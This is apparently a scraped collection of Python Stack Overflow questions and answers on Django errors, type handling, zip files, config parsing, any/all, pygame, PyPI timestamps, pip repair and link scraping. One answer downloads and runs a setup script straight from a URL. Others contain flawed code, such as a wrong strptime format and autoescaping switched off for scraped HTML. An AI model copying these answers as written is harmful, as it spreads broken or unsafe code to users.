psycopg2 - 2.5.1 - active
python-ldap - 2.4.13 - active
python-magic - 0.4.6 - active
pytz - 2013.7 - active
setuptools - 1.1.6 - active
six - 1.4.1 - active
switch2bill-common - 2.8.1 - active
wsgiref - 0.1.2 - active development (/usr/lib/python2.7)
Answer: The list-view of pages is Django-CMS is largely powered by ajax requests.
I would take a look at that view using Firebug to see if any of the publishing
functions are returning 500 errors from ajax requests that won't cause the
view itself to throw a 500.
I've had plugins get corrupted which in turn caused publishing to fail. In the
list-view of pages, the pages appear to publish correctly, as checkboxes get
checked, etc, but in Firebug those ajax POST requests were returning 500
errors.
|
Reverse for '' with arguments '(1L,)' and keyword arguments '{}' not found
Question: I'm new to Django and faced with next problem: when I turn on the appropriate
link I get next error:
`NoReverseMatch at /tutorial/`
`Reverse for 'tutorial.views.section_tutorial' with arguments '(1L,)' and
keyword arguments '{}' not found.`
What am I doing wrong? and why in the args are passed "1L" instead of "1"?
(when i return "1" i get same error.) I tried to change
`'tutorial.views.section_tutorial'` for `'section-detail'` in my template but
still nothing has changed. Used django 1.5.4, python 2.7; Thanks!
`tutorial/view.py`:
def get_xhtml(s_url):
...
return result
def section_tutorial(request, section_id):
sections = Section.objects.all()
subsections = Subsection.objects.all()
s_url = Section.objects.get(id=section_id).content
result = get_xhtml(s_url)
return render(request, 'tutorial/section.html', {'sections': sections,
'subsections': subsections,
'result': result})
`tutorial/urls.py`:
from django.conf.urls import patterns, url
import views
urlpatterns = patterns('',
url(r'^$', views.main_tutorial, name='tutorial'),
url(r'^(?P<section_id>\d+)/$', views.section_tutorial, name='section-detail'),
url(r'^(?P<section_id>\d+)/(?P<subsection_id>\d+)/$', views.subsection_tutorial, name='subsection-detail'),
)
`urls.py`:
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^tutorial/$', include('apps.tutorial.urls')),
)
`main.html`:
{% extends "index.html" %}
{% block content %}
<div class="span2" data-spy="affix">
<ul id="menu">
{% for section in sections %}
<li>
<a href="{% url 'tutorial.views.section_tutorial' section.id %}">{{ section.name }}</a>
<ul>
{% for subsection in subsections%}
{% if subsection.section == section.id %}
<li><a href=#>{{ subsection.name }}</a></li>
{% endif %}
{% endfor %}
</ul>
{% endfor %}
</li>
</ul>
</div>
<div class="span9">
<div class="well">
{% autoescape off%}
{{ result }}
{% endautoescape %}
</div>
</div>
{% endblock %}
Answer: You don't need `$` identifier in url regex in your main urls file when
including app urls:
url(r'^tutorial/$', include('apps.tutorial.urls')),
should be:
url(r'^tutorial/', include('apps.tutorial.urls')),
|
Django "__init__() keywords must be strings" error while running "runserver"
Question: I just set up virtualenv to start django project. I installed everything fine.
when I issue "python manage.py runserver" it spits out this error. I tried all
kind of django runserver error through out and no one seems to have this.
Anyone have insight into it?
Validating models...
Unhandled exception in thread started by <bound method Command.inner_run of <django.contrib.staticfiles.management.commands.runserver.Command object at 0x1016bb0d0>>
Traceback (most recent call last):
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/commands/runserver.py", line 92, in inner_run
self.validate(display_num_errors=True)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/base.py", line 280, in validate
num_errors = get_validation_errors(s, app)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/validation.py", line 35, in get_validation_errors
for (app_name, error) in get_app_errors().items():
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 166, in get_app_errors
self._populate()
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 72, in _populate
self.load_app(app_name, True)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 96, in load_app
models = import_module('.models', app_name)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/utils/importlib.py", line 35, in import_module
__import__(name)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/contrib/auth/models.py", line 21, in <module>
from django.contrib.contenttypes.models import ContentType
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/contrib/contenttypes/models.py", line 127, in <module>
class ContentType(models.Model):
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/base.py", line 97, in __new__
new_class.add_to_class('_meta', Options(meta, **kwargs))
TypeError: Error when calling the metaclass bases
__init__() keywords must be strings
Answer: It's [a known issue](https://code.djangoproject.com/ticket/18961). Django 1.5
[requires](https://docs.djangoproject.com/en/1.5/topics/install/#install-
python) Python 2.6.5 or newer. You have an older version of Python installed
on your computer. You need to [install a newer version of
Python](http://www.python.org/getit/), for example Python 2.7.x.
|
Pythonic way of writing a library function which accepts multiple types?
Question: If, as a simplified example, I am writing a library to help people model
populations I might have a class such as:
class Population:
def __init__(self, t0, initial, growth):
self.t0 = t0,
self.initial = initial
self.growth = growth
where t0 is of type datetime. Now I want to provide a method to determine the
population at a given time, whether that be a datetime or a float containing
the number of seconds since t0. Further, it would be reasonable for the caller
to provide an array of such times (if so, I think it reasonable to assume they
will all be of the same type). There are at least two ways I can see to
accomplish this:
1. Method for each type
def at_raw(self, t):
if not isinstance(t, collections.Iterable):
t = numpy.array([t])
return self.initial*numpy.exp(self.growth*t)
def at_datetime(self, t):
if not isinstance(t, collections.Iterable):
t = [t]
dt = numpy.array([(t1-self.t0).total_seconds() for t1 in t])
return self.at_raw(dt)
2. Universal method
def at(self, t):
if isinstance(t, datetime):
t = (t-self.t0).total_seconds()
if isinstance(t, collections.Iterable):
if isinstance(t[0], datetime):
t = [(t1-self.t0).total_seconds() for t1 in t]
else:
t = np.array([t])
return self.initial*numpy.exp(self.growth*t)
Either would work, but I'm not sure which is more pythonic. I've seen some
suggestions that type checking indicates bad design which would suggest method
1 but as this is a library intended for others to use, method 2 would probably
be more useful.
Note that it is necessary to support times given as floats, even if only the
library itself uses this feature, for example I might implement a method which
root finds for stationary points in a more complicated model where the float
representation is clearly preferable. Thanks in advance for any suggestions or
advice.
Answer: I believe you can simply stick with the Python's Duck Typing Philosophy here
def at(self, t):
def get_arr(t):
try: # Iterate over me
return [get_arr(t1)[0] for t1 in t]
except TypeError:
#Opps am not Iterable
pass
try: # you can subtract datetime object
return [(t-self.t0).total_seconds()]
except TypeError:
#Opps am not a datetime object
pass
# I am just a float
return [t]
self.initial*numpy.exp(self.growth*np.array(get_arr(t)))
Its important, how you order the cases
1. Specific Cases should precede generic cases.
def foo(num):
"""Convert a string implementation to
Python Object"""
try: #First check if its an Integer
return int(num)
except ValueError:
#Well not an Integer
pass
try: #Check if its a float
return float(num)
except ValueError:
pass
#Invalid Number
raise TypeError("Invalid Number Specified")
2. Default Case should be the terminating case
3. If successive cases, are mutually exclusive, order them by likeliness.
4. Prepare for the Unexpected by raising Exception. After all `Errors should never pass silently.`
|
Homework: need to check the time performance of the loop, computer heats
Question: I typed this code in python and my computer really heats and doesn't print
anything! however when I assigned `num = 2**10` it did. How can I calculate
approx. how long will it take for an average computer to run this code? the
code is:
num = 2**100
cnt = 0
import time
t0 = time.clock()
for i in range(num):
cnt = cnt+1
print(cnt)
t1 = time.clock()
print("running time: ", t1-t0, " sec")
Answer: That's because your computer doesn't ever finish the computation with 2**30.
|
Cython: overloaded constructor initialization using raw pointer
Question: I'm trying to wrap two C++ classes: Cluster and ClusterTree. ClusterTree has a
method get_current_cluster() that instantiates a Cluster object, and returns a
reference to it. ClusterTree owns the Cluster object, and manages its creation
and deletion in C++.
I've wrapped Cluster with cython, resulting in PyCluster.
PyCluster should have two ways of creation:
1) By passing in two arrays, which then implies that Python should then
automatically handle deletion (via __dealloc__)
2) By directly passing in a raw C++ pointer (created by ClusterTree's
get_current_cluster()). In this case, ClusterTree then assumes responsibility
of deleting the underlying pointer.
from libcpp cimport bool
from libcpp.vector cimport vector
cdef extern from "../include/Cluster.h" namespace "Terran":
cdef cppclass Cluster:
Cluster(vector[vector[double]],vector[int]) except +
cdef class PyCluster:
cdef Cluster* __thisptr
__autoDelete = True
def __cinit__(self, vector[vector[double]] data, vector[int] period):
self.__thisptr = new Cluster(data, period)
@classmethod
def __constructFromRawPointer(self, raw_ptr):
self.__thisptr = raw_ptr
self.__autoDelete = False
def __dealloc__(self):
if self.__autoDelete:
del self.__thisptr
cdef extern from "../include/ClusterTree.h" namespace "Terran":
cdef cppclass ClusterTree:
ClusterTree(vector[vector[double]],vector[int]) except +
Cluster& getCurrentCluster()
cdef class PyClusterTree:
cdef ClusterTree *__thisptr
def __cinit__(self, vector[vector[double]] data, vector[int] period):
self.__thisptr = new ClusterTree(data,period)
def __dealloc__(self):
del self.__thisptr
def get_current_cluster(self):
cdef Cluster* ptr = &(self.__thisptr.getCurrentCluster())
return PyCluster.__constructFromRawPointer(ptr)
This results in:
Error compiling Cython file:
------------------------------------------------------------
...
def get_current_cluster(self):
cdef Cluster* ptr = &(self.__thisptr.getCurrentCluster())
return PyCluster.__constructFromRawPointer(ptr)
^
------------------------------------------------------------
terran.pyx:111:54: Cannot convert 'Cluster *' to Python object
Note I cannot cdef __init__ or @classmethods.
Answer: I know this is an old question, but after my own recent struggles with Cython
I thought I'd post an answer for the sake of posterity.
It seems to me you could use a copy constructor to create a new PyCluster
object from an existing Cluster object.
Define the copy constructor in your C code, then call the copy constructor in
the Python class definition (in this case, when a pointer is passed) using
`new`. This will work, although it may not be the best or most performant
solution.
|
python: Open file from zip without temporary extracting it
Question: How can I open files from a zip archive without extracting them first?
I'm using pygame. To save disk space, I have all the images zipped up. Is it
possible to load a given image directly from the zip file? For example:
`pygame.image.load('zipFile/img_01')`
Answer: Vincent Povirk's answer won't work completely;
import zipfile
archive = zipfile.ZipFile('images.zip', 'r')
imgfile = archive.open('img_01.png')
...
You have to change it in:
import zipfile
archive = zipfile.ZipFile('images.zip', 'r')
imgdata = archive.read('img_01.png')
...
For details read the notes under 'ZipFile.open(name[, mode[, pwd]])' in the
documentation on: <http://docs.python.org/2/library/zipfile>
|
How to replace characters that have already been printed in a previous line
Question: I am trying to make a game similar to [this](http://candies.aniwey.net/) in
Python (3.3.2 on Windows). I think that most of the programming is fairly
basic and so it will be easy for me as beginner. What I can't understand is
how to have a line of code that is constantly being changed while remaining in
the same location (I am trying to describe the amount of candies that you
have[if you look the line stays in the same place yet the physical str
changes]). I understand that you will have to do something like:
candiesNbrDisplay = 'You have ' + str(candiesNbrOwned) + ' candies!'
candiesNbrOwned = candiesNbrOwned + 1
time.sleep( 1)
but how do you change the number without [this](http://imgur.com/mNj0A9S)!
Answer: This works on Unix (Mac OS X 10.8.5, with Python 2.7.2):
import time
import sys
for i in xrange(1, 10):
print "\rThe number of candies is %d and the pile is growing" % i,
sys.stdout.flush()
time.sleep(1)
print ""
I don't know whether it will work on Windows or with Python 3.
|
Redirect text from editor directly to python script
Question: is there a way to open text editor like vim or gedit from python script and
then redirect typed text from text editor back directly to python script so I
could save it in database? Something like git commit command which opens
external text editor and on exit saves commit message but not into file.
Answer: I think you would end up depending too much on $EDITOR specific behaviour
without a tempfile. The tempfile module deals with the choice of a tempdir and
tempfilename so you will not have to. Try the following.
manedit.py:
import os
import tempfile
import subprocess
data = '6 30 210 2310 30030'
mefile = tempfile.NamedTemporaryFile( delete=False )
# delete=False otherwise delete on close()
mefile.write( data )
mefile.close()
subprocess.call( [ os.environ.get('EDITOR','') or 'vim', mefile.name ] )
# unset EDITOR or EDITOR='' -> default = vim
# block here
mefile = open( mefile.name, 'r' )
newdata = mefile.read()
mefile.close()
os.remove( mefile.name )
print( newdata )
And then try the following commands to verify each scenario. Replace ed with
an editor that differs from your $EDITOR
python manedit.py
env EDITOR= python manedit.py
env EDITOR=ed python manedit.py
env -u EDITOR python manedit.py
The pitfall: The script blocks only while EDITOR is running. An editor may
just open a new window on an existing editor session and return, suggesting
that the manual edit session completed. However I know no such editor.
edit: If you are interested specifically in vim or you want to see how
specific such thing can get, see the following:
<http://vimdoc.sourceforge.net/htmldoc/remote.html>
<http://petro.tanrei.ca/2010/8/working-with-vim-and-ipython.html>
<http://www.freehackers.org/VimIntegration>
|
How to read a config file using python
Question: I have a config file `abc.txt` which looks somewhat like:
path1 = "D:\test1\first"
path2 = "D:\test2\second"
path3 = "D:\test2\third"
I want to read these paths from the `abc.txt` to use it in my program to avoid
hard coding.
Answer: In order to use my example,Your file "abc.txt" needs to look like:
[your-config]
path1 = "D:\test1\first"
path2 = "D:\test2\second"
path3 = "D:\test2\third"
Then in your software you can use the config parser:
import ConfigParser
and then in you code:
configParser = ConfigParser.RawConfigParser()
configFilePath = r'c:\abc.txt'
configParser.read(configFilePath)
Use case:
self.path = configParser.get('your-config', 'path1')
|
Python: get OS language
Question: What is a way to get current Windows (or OSX) Locale id on Python 2.x. I want
to get an int (or str) which tells what language in OS is active.
Is possible without using WinAPI?
Answer: This is the documentation related to the
**[locale](http://www.python.org/doc//current/library/locale.html)** module in
Python 2.6.
To be more specific, here is an example (from the above link) of how to get
your system's locale:
import locale
loc = locale.getlocale() # get current locale
locale.getdefaultlocale() # Tries to determine the default locale settings and returns them as a tuple of the form (language code, encoding); e.g, ('en_US', 'UTF-8').
|
SyntaxError: Invalid Syntax PLEASE help me
Question: Hey guys I am trying to learn Python Through an online book here:
<http://learnpythonthehardway.org/book/ex1.html>
However, I am trying to run a program to make it say stuff (I am trying to use
Windows Power Shell like it suggested) and I keep getting an error
Program:
print "hello world!"
Error:
File "<stdin>", line 1
python exp1.py
^
SyntaxError: Invalid Syntax
I am using ActivePython 2.7.5.6
Answer: Try
import exp1
instead, since you already are inside an interpreter, as @hcwhsa said.
But that's really just an easy-to-give workaround. You should exit the
interpreter and execute the command from outside it.
|
cannot resolve AttributeError: 'module' object has no attribute 'calcKappa'
Question: I'm completely new to python. Now i'm using Enthought canopy (python 2.7.3). I
know this question has been asked a million times before and i can imagine you
all are tired of this question but it has been bugging me all day.
import Basismodel
def doAll(c):
#from Basismodel import calcKappa
Basismodel.setC(c)
Basismodel.setMu()
Basismodel.setLambda()
Basismodel.calcKappa()
Basismodel.calcSumofprob()
Basismodel.calcPi()
doAll(100)
With another file Basismodel.py where all functions mentioned in here are
defined. It doesn't give any error with the first 3 but it does with the last
3.
As extra information I'll give you the code for Basismodel.py as well
global c
global lamb
global pi
global kappa
global mu
global sumofkappa
global f
f=0.6 #the percentage that takes the car
c=100 #max
sumofkappa=0 #sum of all kappa
sumofpi=0 #sum of all probabilities (should be equal to 1)
pi=[]
kappa=[1.0]
mu=[0.4]
lamb=[0.1] #Lambda is de arrival rate
def setC(y):
c=y
#print c
def setMu():
global mu
for i in range (c):
mu.append((i+2)*mu[0])
#print mu[i]
def setLambda():
for i in range (c):
lamb.append(lamb[1])
#print lamb[i]
def calcKappa():
for i in range (c):
if (i==0):
kappa[0]=1.0
else:
kappa[i].append(kappa[i-1]*lamb[i-1]/mu[i])
def calcSumofprob():
for i in range (c):
global sumofkappa
sumofkappa += kappa[i]
def calcPi():
for i in range (c):
pi.append(kappa[i]/sumofkappa)
def calcAveragePi():
for i in range(c):
global sumofpi
sumofpi += pi[i]
return sumofpi/c
When I execute the main it gives this error, it doesn't make any sense since
all print lines are in #comment style. However I am more interested in why it
can't find the attribute. Also when i set "#from .Basismodel import calcKappa"
after def doAll, the error changes to an importerror where it can't import.
%run "C:/Users/Thomas/Dropbox/Thesis/Canopy files/Main.py"
100
0.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
C:\Users\Thomas\AppData\Local\Enthought\Canopy\App\appdata\canopy-1.1.0.1371.win-x86_64\lib\site-packages\IPython\utils\py3compat.pyc in execfile(fname, glob, loc)
174 else:
175 filename = fname
--> 176 exec compile(scripttext, filename, 'exec') in glob, loc
177 else:
178 def execfile(fname, *where):
C:\Users\Thomas\Dropbox\Thesis\Canopy files\Main.py in <module>()
17 return Basismodel.calcAveragePi()
18
---> 19 doAll(100)
20
21 #while(condition==0):
C:\Users\Thomas\Dropbox\Thesis\Canopy files\Main.py in doAll(c)
12 Basismodel.setMu()
13 Basismodel.setLambda()
---> 14 Basismodel.calcKappa()
15 Basismodel.calcSumofprob()
16 Basismodel.calcPi()
AttributeError: 'module' object has no attribute 'calcKappa'
Can anybody help?
Answer:
global c
global lamb
global pi
global kappa
global mu
global sumofkappa
global f
Those lines don't do what you think they do. `global` is a keyword that is
place within a function to reference the global declaration of a variable.
e.g.
x = 42
def without_global():
x = 9
print(x)
def with_global():
global x
x = 13
print(x)
print(x)
without_global()
print(x)
with_global()
print(x)
I get entirely different issues here, though.
|
How do Python's any and all functions work?
Question: I'm trying to understand how the `any()` and `all()` Python built-in functions
work.
I'm trying to compare the tuples so that if any value is different then it
will return `True` and if they are all the same it will return `False`. How
are they working in this case to return [False, False, False]?
`d` is a `defaultdict(list)`.
print d['Drd2']
# [[1, 5, 0], [1, 6, 0]]
print list(zip(*d['Drd2']))
# [(1, 1), (5, 6), (0, 0)]
print [any(x) and not all(x) for x in zip(*d['Drd2'])]
# [False, False, False]
To my knowledge, this should output
# [False, True, False]
since (1,1) are the same, (5,6) are different, and (0,0) are the same.
**Why is it evaluating to False for all tuples?**
Answer: You can roughly think of `any` and `all` as series of logical `or` and `and`
operators, respectively.
**any**
`any` will return `True` when **atleast one of the elements** is Truthy. Read
about [Truth Value
Testing.](http://docs.python.org/2/library/stdtypes.html#truth-value-testing)
**all**
`all` will return `True` only when **all the elements** are Truthy.
**Truth table**
+-----------------------------------------+---------+---------+
| | any | all |
+-----------------------------------------+---------+---------+
| All Truthy values | True | True |
+-----------------------------------------+---------+---------+
| All Falsy values | False | False |
+-----------------------------------------+---------+---------+
| One Truthy value (all others are Falsy) | True | False |
+-----------------------------------------+---------+---------+
| One Falsy value (all others are Truthy) | True | False |
+-----------------------------------------+---------+---------+
| Empty Iterable | False | True |
+-----------------------------------------+---------+---------+
**Note 1:** The empty iterable case is explained in the official
documentation, like this
[**`any`**](https://docs.python.org/2/library/functions.html#any)
> Return `True` if any element of the iterable is true. **If the iterable is
> empty, return`False`**
Since none of the elements is true, it returns `False` in this case.
[**`all`**](https://docs.python.org/2/library/functions.html#all)
> Return `True` if all elements of the iterable are true (**or if the iterable
> is empty**).
Since none of the elements is false, it returns `True` in this case.
* * *
**Note 2:**
Another important thing to know about `any` and `all` is, it will short-
circuit the execution, the moment they know the result. The advantage is,
entire iterable need not be consumed. For example,
>>> multiples_of_6 = (not (i % 6) for i in range(1, 10))
>>> any(multiples_of_6)
True
>>> list(multiples_of_6)
[False, False, False]
Here, `(not (i % 6) for i in range(1, 10))` is a generator expression which
returns `True` if the current number within 1 and 9 is a multiple of 6. `any`
iterates the `multiples_of_6` and when it meets `6`, it finds a Truthy value,
so it immediately returns `True`, and rest of the `multiples_of_6` is not
iterated. That is what we see when we print `list(multiples_of_6)`, the result
of `7`, `8` and `9`.
This excellent thing is used very cleverly in [this
answer](http://stackoverflow.com/a/16801605/1903116).
* * *
With this basic understanding, if we look at your code, you do
any(x) and not all(x)
which makes sure that, atleast one of the values is Truthy but not all of
them. That is why it is returning `[False, False, False]`. If you really
wanted to check if both the numbers are not the same,
print [x[0] != x[1] for x in zip(*d['Drd2'])]
|
Detecting collision when rotating
Question: I have a chain of squares represented in pygame. I have some code that lets me
rotate parts of the chain, as follows.
#!/usr/bin/python
import pygame
def draw(square):
(x,y) = square
pygame.draw.rect(screen, black, (100+x*20,100+y*20,20,20), 1)
def rotate(chain, index, direction):
(pivotx, pivoty) = chain[index]
if (direction == 1):
newchain = chain[:index]+[(y-pivoty+pivotx, (x-pivotx)+pivoty) for (x,y) in chain[index:]]
else:
newchain = chain[:index]+[(y-pivoty+pivotx, -(x-pivotx)+pivoty) for (x,y) in chain[index:]]
return newchain
pygame.init()
size = [600, 600]
screen = pygame.display.set_mode(size)
white = (255,255,255)
black = (0,0,0)
n = 20
chain = [(i,0) for i in xrange(n)]
screen.fill(white)
for square in chain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
newchain = rotate(chain, 5, 1)
print chain
print newchain
screen.fill(white)
for square in newchain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
screen.fill(white)
newchain = rotate(newchain, 10,0)
for square in newchain:
draw(square)
pygame.display.flip()
raw_input("Press Enter to continue...")
pygame.quit()
The function rotate takes an index of a square in the chain and rotates the
whole chain after that square by 90 degrees, pivoting around the initial
square. The problem is that this is meant to mimic a physical toy so it is not
allowed to collide with itself. I can check to see if two squares are on top
of each other after a rotation but how can I make sure they wouldn't collide
temporarily during a rotation?
Answer: It sounds like you already know how to know if they're overlapping once you do
the rotation, unless I am misunderstanding. If that's the case, then it would
be relatively easy to define a function to answer that question given a
potential rotation in the chain by adding a check to the end of your
comprehension:
if (direction == 1):
newchain = chain[:index]+[(y-pivoty+pivotx, (x-pivotx)+pivoty) for (x,y) in chain[index:] if not overlapping(x, y, pivotx, pivoty)]
else:
newchain = chain[:index]+[(y-pivoty+pivotx, -(x-pivotx)+pivoty) for (x,y) in chain[index:] if not overlapping(x, y, pivotx, pivoty)]
And of course relying on some kind of:
def overlapping(x, y, px, py):
if (some logic that determins if this is bad):
raise Exception('Overlapping')
return True
You would need to do something useful with the exception, but at least this
would check each square as you process it, and break out immediately instead
of waiting until after the whole rotation to verify that it's good.
|
how to parse time stamps in Python from PyPI packages (eg. 12-Oct-2010 06:40)
Question: I'm wondering if there is a straightforward way to do this, since PyPI is the
Python packaging authority, it seems like parsing these time stamps (into the
epoch time perhaps) should then be handled in Python somewhat easily, but it
eludes me how to do this.
As an example, here are the time stamps of when different versions of IPython
were uploaded:
<https://pypi.python.org/packages/source/i/ipython/>
Could someone please explain to me how to parse these time stamps with Python
into the epoch in a sensible way.
Answer: Instead of trying to parse the directory listing output, use the PyPI API.
There are:
* a [JSON API](https://wiki.python.org/moin/PyPIJSON?action=show&redirect=PyPiJson)
* a [XML-RPC interface](https://wiki.python.org/moin/PyPIXmlRpc?action=show&redirect=PyPiXmlRpc)
* and a [HTTP API](http://www.python.org/dev/peps/pep-0301/)
which give you _parsed_ access to that information. For example, the [JSON
link for ipython release
0.10.1](https://pypi.python.org/pypi/ipython/0.10.1/json) gives you ISO8601
dates:
"urls": [
{
"has_sig": false,
"upload_time": "2010-10-12T08:40:01",
"comment_text": "",
"python_version": "source",
"url": "https://pypi.python.org/packages/source/i/ipython/ipython-0.10.1.tar.gz",
"md5_digest": "54ae47079b0e9a0998593a99ce76ec1f",
"downloads": 20100,
"filename": "ipython-0.10.1.tar.gz",
"packagetype": "sdist",
"size": 5837840
},
{
"has_sig": false,
"upload_time": "2010-10-12T08:40:38",
"comment_text": "",
"python_version": "source",
"url": "https://pypi.python.org/packages/source/i/ipython/ipython-0.10.1.zip",
"md5_digest": "f636c7ea03ff626a6ef9bd9a901de691",
"downloads": 29725,
"filename": "ipython-0.10.1.zip",
"packagetype": "sdist",
"size": 6419900
}
]
which can be parsed into [`datetime.datetime`
objects](http://docs.python.org/2/library/datetime.html):
>>> import datetime
>>> datestr = "2010-10-12T08:40:01"
>>> datetime.datetime.strptime(datestr, '%Y-%m-%dT%H:%M:%S')
datetime.datetime(2010, 10, 12, 8, 40, 1)
That said, the date format in your sample listing can be parsed with:
>>> datestr = "12-Oct-2010 06:40"
>>> datetime.datetime.strptime(datestr, '%m-%b-%Y %H:%M')
datetime.datetime(2010, 12, 1, 6, 40)
but the behavior of the `%b` placeholder is dependent on your locale; it'll
only work correctly here when that is set to C or english.
The best way to parse _arbitrary_ dates then, is to use the [`python-dateutil`
package](http://labix.org/python-dateutil) (an add-on install), as it's parser
is very robust:
>>> from dateutil.parser import parse
>>> parse(datestr)
datetime.datetime(2010, 10, 12, 6, 40)
|
File is not creating in python when unicode present in the file name
Question: I need to store HTML file as text files. In the same name of web tittle.
something went wrong with my code so that it is not creating file in side the
directory. I have directory permission to write. I am using Ubuntu 12.04LTS
Directory `/home/user1/` File name print name = Mathrubhumi Sports -
ശ്രീനിക്ക് പച്ചക്കൊടി
The file name contain Unicode values
import os
from urllib import urlopen
from bs4 import BeautifulSoup
url= "http://www.mathrubhumi.com/sports/story.php?id=397111"
raw = urlopen(url).read()
soup = BeautifulSoup(raw,'lxml')
texts = soup.findAll(text=True)
name = soup.title.text
name= name+'.txt'
def contains_unicode(text):
try:
str(text)
except:
return True
return False
result = ''.join((text for text in texts if contains_unicode(text)))
# Output to a file
with open(os.path.join('/home/user1/textfiles',name,'w') as out:
out.write(result)
Please help me to debug it
Answer: I tried this and it worked, it created a file called Mathrub*.txt with some
text in it in the current directory.
import codecs
import os
from urllib import urlopen
from bs4 import BeautifulSoup
url= "http://www.mathrubhumi.com/sports/story.php?id=397111"
raw = urlopen(url).read()
soup = BeautifulSoup(raw,'lxml')
texts = soup.findAll(text=True)
name = soup.title.string
name= name+'.txt'
def contains_unicode(text):
try:
str(text)
except:
return True
return False
result = ''.join((text for text in texts if contains_unicode(text)))
# Output to a file
with codecs.open(name,'w',encoding="utf-8") as out:
out.write(result)
Before adding the codecs part, it complained loudly about trying to write some
characters that it did not know how to interpret.
|
Easy_install and pip broke: pkg_resources.DistributionNotFound: distribute==0.6.36
Question: I was tried to upgrade pip with `pip install --upgrade pip` on OSX and pip and
easy_install both dont work.
When running pip
Traceback (most recent call last):
File "/usr/local/bin/pip", line 5, in <module>
from pkg_resources import load_entry_point
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 2881, in <module>
parse_requirements(__requires__), Environment()
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 596, in resolve
raise DistributionNotFound(req)
pkg_resources.DistributionNotFound: pip==1.3.1
When running easy_install
File "/usr/local/bin/easy_install", line 5, in <module>
from pkg_resources import load_entry_point
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 2881, in <module>
parse_requirements(__requires__), Environment()
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/distribute-0.6.49-py2.7.egg/pkg_resources.py", line 596, in resolve
raise DistributionNotFound(req)
pkg_resources.DistributionNotFound: distribute==0.6.36
How can I fix this?
**UPDATE** I found the solution.
I did `cd /usr/local/lib/python2.7/site-packages && ls`
found `pip-1.4.1-py2.7.egg-info` and `distribute-0.6.49-py2.7.egg` in the
directory.
Then the following steps fixed the issue.
1. Changed the pip version to 1.4.1 in `/usr/local/bin/pip`
2. Changed distribute version to 0.6.49 in `/usr/local/bin/easy_install`
* * *
The answers on other such questions to curl ez_setup.py and install setuptools
from it didnt work. It gave the following error.
Downloading https://pypi.python.org/packages/source/s/setuptools/setuptools-1.1.6.tar.gz
Traceback (most recent call last):
File "<stdin>", line 370, in <module>
File "<stdin>", line 366, in main
File "<stdin>", line 278, in download_setuptools
File "<stdin>", line 185, in download_file_curl
File "/usr/local/Cellar/python/2.7.4/Frameworks/Python.framework/Versions/2.7/lib/python2.7/subprocess.py", line 542, in check_call
raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['curl', 'https://pypi.python.org/packages/source/s/setuptools/setuptools-1.1.6.tar.gz', '--silent', '--output', '/usr/bin/setuptools-1.1.6.tar.gz']' returned non-zero exit status 23
Answer: Install the distribute package as follows:
$ wget https://svn.apache.org/repos/asf/oodt/tools/oodtsite.publisher/trunk/distribute_setup.py
$ python distribute_setup.py
You will have a working `easy_install` then.
Happy Coding.
|
get all link site in source html (python)
Question: I want get all link in one web page ,this function only one link but need get
all link ! of course i know need The One Ring true but i don't know use
i need get all link
def get_next_target(page):
start_link = page.find('<a href=')
start_quote = page.find('"', start_link)
end_quote = page.find('"', start_quote + 1)
url = page[start_quote + 1:end_quote]
return url, end_quote
Answer: This is where a HTML parser comes in handy. I recommend
[`BeautifulSoup`](http://www.crummy.com/software/BeautifulSoup/):
from bs4 import BeautifulSoup as BS
def get_next_target(page)
soup = BS(page)
return soup.find_all('a', href=True)
|
Chinese Restaurant Process implementation in Python
Question: I have wrote a code in Python for CRP problem. The problem itself can be found
here: <http://cog.brown.edu/~mj/classes/cg168/slides/ChineseRestaurants.pdf>
And to give a short description of it: Suppose we want to assign people
entering to a restaurants to potentially infinite number of tables. If $z_i$
represents the random variable assigned for the $i$'th person entering the
restaurant the following should hold:
With probability $p(z_i=a|z_1,...,z_{i-1})=\frac{n_a}{i-1+\alpha} for $n_a>0$,
$i$'th person will sit in table $a$ and with probability
$p(z_i=a|z_1,...,z_{i-1})=\frac{\alpha}{i-1+\alpha} $i$'th person will sit
